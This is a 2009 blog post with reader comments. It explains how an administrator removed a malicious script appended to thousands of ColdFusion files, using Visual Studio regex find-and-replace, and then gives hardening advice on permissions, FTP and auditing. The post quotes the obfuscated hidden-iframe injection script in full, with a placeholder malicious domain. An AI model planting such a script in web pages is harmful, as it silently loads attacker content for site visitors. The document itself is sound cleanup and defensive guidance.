Recently at work I was dealing with a server-wide compromise on a web server. A specific injection was appended to over 2000 files *.cfm files. Once getting permissions in order (the root issue) I was trying to figure out how to remove the injections. We have a very strong Storage Operations team and we make backups daily, however restores tend to scare customers. Since the injections were all appended and none of the legitimate data was overwritten, it just needed to be removed.
Open Visual Studio and press ctrl+f. “Quick Replace” -> “Replace in Files”.
The injection we want to remove for this example is as follows:
<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://www.maliciousdomain";
var applstrna2 = ".com/CONTENT/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>
Notice the multiple line breaks and special characters, this is where Visual Studio regular expressions become handy.
http://msdn.microsoft.com/en-us/library/2k3te2cs(VS.80).aspx
For this situation this we need to understand how to use these expressions:
Any character . Matches any single character except a line break.
Zero or more * Matches zero or more occurrences of the preceding expression, making all possible matches.
Line break \n Matches a platform-independent line break. In a Replace expression, inserts a line break.
Escape \ Matches the character that follows the backslash (\) as a literal. This allows you to find the characters used in regular expression notation, such as { and ^. For example, \^ Searches for the ^ character.
Here is the final search string:
\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n.*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n.*\<\/script\>
Be sure to select “Use: Regular Expressions” , then “Replace all”. If you’re on an internal network you can just use a UNC path in the “Look in:” input.
Once it completes it will tell you how many occurrences were replaced and it will actually make a log of it in your find results pane window.
Replace all "\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n .*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n .*\<\/script\>", "", Regular expressions, Find Results 1, "C:\", "*.aspx" C:\Default.aspx(32,1): Total replaced: 1 Matching files: 1 Total files searched: 1
March 2nd, 2009 at 1:18 pm
How did you stop theSQL injection?
March 2nd, 2009 at 3:55 pm
SQL injection is a completely different subject. The injections I spoke of above were directly in files, not in database records. It was also file permissions related.
Preventing SQL injection is a matter of sanitizing all GET and POST variables.
http://en.wikipedia.org/wiki/SQL_injection#Preventing_SQL_Injection
March 5th, 2009 at 11:38 am
May I ask for more details about the injection itself, specifically how it happened and how you resolved it? You mentioned “getting permissions in order”. Could you elaborate? I’m asking because I have a Coldfusion site that has fallen victim to the same compromise. I can repair the damage just fine, but I’m not sure how to prevent it from happening again.
Thanks!
March 5th, 2009 at 11:00 pm
Hello Jim,
The root issue was web server file permissions. A certain Windows users group had full permissions recursively to all web files. One site was compromised and was used to inject files on the entire server.
First you need to make sure your site’s file permissions are secure, depending on your host you may not be able to see the entire ACL (access control list) for your files. If that’s the case just ask them to double check to make sure no random Windows users groups have write permissions to your files.
Second also verify the original compromise was not an FTP compromise. Have your host check the FTP logs from the day your files were injected. If it was an FTP compromise, update your passwords and scan all workstations used to connect via FTP for viruses, loggers, sniffers, etc..
If it wasn’t an FTP compromise have your host double check the sandbox securities in ColdFusion admin and verify that no other sites have something stupid like recursive write access to the directory where all the websites are stored.
Assuming your site is on a Windows server have your host setup Windows file auditing/logging for the EVERYONE group on a few of the files that got injected previously. That way if it does happen again you (well, your host) will have evidence of what Windows user wrote to the file.
Hope that helps.